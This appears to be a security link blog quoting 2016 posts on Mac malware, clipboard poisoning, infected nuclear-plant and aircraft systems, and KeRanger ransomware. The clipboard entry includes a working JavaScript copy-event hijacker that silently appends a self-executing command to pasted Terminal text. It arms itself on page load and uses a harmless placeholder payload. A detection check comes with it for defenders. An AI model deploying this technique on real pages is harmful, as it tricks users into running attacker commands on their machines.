Mac Malware of 2016 →

January 4, 2017 · 19:47

Patrick Wardle:

Due to sheer volume, Windows malware generally dominates the malicious code and news scene. Of course, Macs are susceptible to malware as well and 2016 saw a handful of new malware targeting Apple computers.

In this blog, I wanted to discuss all Mac malware that appeared this year. While each sample has been reported on before (i.e. by the AV company that discovered it), this blog aims to cumulatively cover all in one place. Moreover, for each, we’ll identify the infection vector, persistence mechanism, features/goals, and describe disinfection.

You will also find all the locations where the malware installs itself.

P.S. I have never been infected in the decade or so as a Mac user.[1]

  [1] *knock on wood*

How to Avoid Clipboard Poisoning Attacks on the Mac →

June 4, 2016 · 14:56

Thomas Reed:

Graham Cluley drew my attention the other day to an issue that has apparently been known to some for years, but was new to me: clipboard poisoning, an issue where a website can replace what you think is on your clipboard with something else (…)

It turns out that there’s a possibility that this could lead to remote code execution. In other words, it could lead to someone else’s malicious code being run on your computer without your knowledge!

Once malicious code has been run on your computer, that code can download and install other processes, and in no time, your Mac has been pwned.

The key to this issue lies with any code that the user might copy from a website, then copy somewhere else in such a way that it is automatically executed. It turns out that this is possible with shell scripts pasted into the Terminal.

As an example, consider the following command, which is commonly cited as a way to make your Mac show hidden files:

defaults write com.apple.finder AppleShowAllFiles TRUE; killall Finder

Read his full post for tips how to keep yourself safe.
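To make the mechanism concrete, here is an added example (not code from Thomas Reed's post): a page script that hooks the browser's `copy` event and swaps the selected text for a poisoned version, plus the small check a defender can apply before pasting. The `extraCommand` argument and `looksPoisoned` helper are illustrative names chosen for this example; the trailing newline is the detail that matters, because Terminal runs a pasted line that ends in a newline without waiting for the user to press Return.

```javascript
// Added example, not from the original post: how a web page can poison the
// clipboard, and why the trailing newline makes the paste self-executing.

// The command the victim believes they are copying (the one shown on the page).
const SHOWN_COMMAND =
  "defaults write com.apple.finder AppleShowAllFiles TRUE; killall Finder";

// Builds the string the attacker actually places on the clipboard.
// `extraCommand` is a placeholder for whatever the attacker wants executed;
// "echo pwned" stands in for a real payload. The "\n" at the end means the
// pasted line runs in Terminal immediately, before the user can read it.
function poisonClipboardText(selectedText, extraCommand) {
  return `${extraCommand}; ${selectedText}\n`;
}

// Hooks the standard ClipboardEvent API: on every copy, write our own
// text/plain data and call preventDefault so the browser does not write the
// real selection. `doc` is the Document (passed in so it can be faked in a test).
function installCopyHandler(doc, extraCommand) {
  doc.addEventListener("copy", (e) => {
    const selected = doc.getSelection ? String(doc.getSelection()) : "";
    e.clipboardData.setData(
      "text/plain",
      poisonClipboardText(selected, extraCommand)
    );
    e.preventDefault();
  });
}

// Defender-side check: what actually landed on the clipboard should be
// exactly what was shown, and a single-line command should never carry a
// newline. Paste into a plain text editor first and compare before using
// Terminal.
function looksPoisoned(shownText, pastedText) {
  return pastedText.includes("\n") || pastedText.trim() !== shownText.trim();
}

// Only arm the handler when running inside a real browser page.
if (typeof document !== "undefined") {
  installCopyHandler(document, "echo pwned");
}
```

The `looksPoisoned` check is deliberately strict: any difference between the text displayed on the page and the text that arrives from the clipboard is grounds to discard the paste, since the page controls both what you see and what you copy.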

via @qurczaq


Aeroplanes & German Nuclear Plant Infected With Viruses →

April 28, 2016 · 10:11

Christoph Steitz & Eric Auchard:

A nuclear power plant in Germany has been found to be infected with computer viruses, but they appear not to have posed a threat to the facility’s operations because it is isolated from the Internet, the station’s operator said on Tuesday.

Lucky break. Otherwise we’d ‘just’ have a nuclear disaster on our hands.

Mikko Hypponen, chief research officer for Finland-based F-Secure, said that infections of critical infrastructure were surprisingly common, but that they were generally not dangerous unless the plant had been targeted specifically.

I guess we’d find out if a particular plant had been targeted or not after the fact, and after a potential disaster. Seems like a good way to go about security. Right?

As an example, Hypponen said he had recently spoken to a European aircraft maker that said it cleans the cockpits of its planes every week of malware designed for Android phones. The malware spread to the planes only because factory employees were charging their phones with the USB port in the cockpit.

Seriously? How the fuck is this even possible? Fortunately…

Because the plane runs a different operating system, nothing would befall it.

Unless the malware was written to target that OS.


Transmission for OS X Infected With KeRanger Ransomware →

March 7, 2016 · 08:03

Claud Xiao and Jin Chen:

On March 4, we detected that the Transmission BitTorrent client installer for OS X was infected with ransomware, just a few hours after installers were initially posted. We have named this Ransomware “KeRanger.” The only previous ransomware for OS X we are aware of is FileCoder, discovered by Kaspersky Lab in 2014. As FileCoder was incomplete at the time of its discovery, we believe KeRanger is the first fully functional ransomware seen on the OS X platform.

Attackers infected two installers of Transmission version 2.90 with KeRanger on the morning of March 4. When we identified the issue, the infected DMG files were still available for downloading from the Transmission site. Transmission is an open source project. It’s possible that Transmission’s official website was compromised and the files were replaced by re-compiled malicious versions, but we can’t confirm how this infection occurred.

You’ll find the malware removal instructions under the title’s link.